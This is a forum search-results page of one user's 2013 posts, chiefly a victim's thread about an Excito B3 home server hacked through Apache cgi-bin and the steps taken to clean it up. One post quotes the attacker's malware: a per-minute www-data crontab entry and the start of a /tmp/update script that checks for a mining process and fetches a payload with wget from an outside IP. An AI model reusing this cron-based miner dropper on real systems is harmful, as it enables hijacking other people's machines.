Search found 976 matches

by RandomUsername
06 Nov 2013, 09:07
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

It installed OK for me but I don't know how to test for the vulnerability.
by RandomUsername
06 Nov 2013, 03:40
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

johannes wrote:Just FYI, we are testing an update right now, hope to release soon.
Thanks Johannes. I appreciate the quick response.
by RandomUsername
04 Nov 2013, 02:11
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Looks like I got hit again yesterday afternoon. Different code this time though. www-data crontab: * * * * * /tmp/update >/dev/null 2>&1 contents of /tmp/update: #!/bin/sh plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'` if [ "$plm" != "" ] then echo "MERGE!!!" else nohup wget http://74...
by RandomUsername
03 Nov 2013, 16:30
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Slight correction to Ubi's first command:

Code: Select all

crontab -u www-data -r
by RandomUsername
03 Nov 2013, 08:31
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
by RandomUsername
03 Nov 2013, 04:18
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

I was wondering the same thing myself. I checked my /dev/shm and there are no hidden files there.
by RandomUsername
31 Oct 2013, 10:54
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Where should I be putting that rule? In /etc/apache2/conf.d/admin.conf ?
by RandomUsername
31 Oct 2013, 10:22
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Thanks. I notice that was only posted a couple of days ago so is this a fairly new exploit? Is mitigation only possible by patching Apache as implied by that article?

I've set the ScriptAlias section to "deny from all" as I mentioned above, will that do the trick do you think?
by RandomUsername
31 Oct 2013, 10:16
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

This is in my sites-enabled/bubba file: ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> Is the "allow from all" line the problem? Should I change it to "Deny from ...
by RandomUsername
31 Oct 2013, 10:10
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

Re: I have been attacked and don't know why.

Ah, OK. Thanks for that. I don't think I've ever changed that so I wonder if it's a default setting on the B3.
by RandomUsername
31 Oct 2013, 09:45
Forum: B2 & B3 Support
Topic: I have been attacked and don't know why.
Replies: 209
Views: 70777

I have been attacked and don't know why.

By a series of coincidences, I noticed that a crontab file was created yesterday for my www-data user (it was quite lucky, it could have been weeks before I noticed). The crontab is identical to the one mentioned here: http://security.stackexchange.com/questions/16908/is-secureshellz-bot-a-virus-how...
by RandomUsername
15 Oct 2013, 03:45
Forum: Software releases
Topic: Release notes for Excito Bubba 2&3 software version 2.6
Replies: 114
Views: 44626

Re: Release notes for Excito Bubba 2&3 software version 2.6

But why risk your reputation on giving out potentially buggy installers when a fresh install and full upgrade works just as well?
by RandomUsername
13 Sep 2013, 13:42
Forum: Announcements
Topic: [Cancelled] OpenProducts to take over Excito B3 product line
Replies: 50
Views: 28799

Re: [Cancelled] OpenProducts to take over Excito B3 product

Ubi, I'm curious what problems you need solutions for? From my perspective, my B3 sits in the corner doing its thing and I don't have to worry about it. I don't expect any future updates*. Sure, it would be nice if someone was planning a B4, but that no one is only enough to get me just a little dis...
by RandomUsername
11 Sep 2013, 06:03
Forum: B2 & B3 Support
Topic: issues with updating
Replies: 4
Views: 1788

Re: issues with updating

Is this a B2? I can't remember the specifics, but there was an upgrade that require a reinstall due to large changes in the code base. It should be fairly painless if done right.
by RandomUsername
31 Jul 2013, 16:21
Forum: Feedback
Topic: Who else does not get mail notifications ... [solved]
Replies: 7
Views: 6955

Re: Who else does not get mail notifications from the forum?

I receive them OK but I am hosting my own mail server on the B3.
This can only be solved by Exito by delivering the mails though an officially approved mail server.
By who's definition would it be officially approved? The Internet police? ;)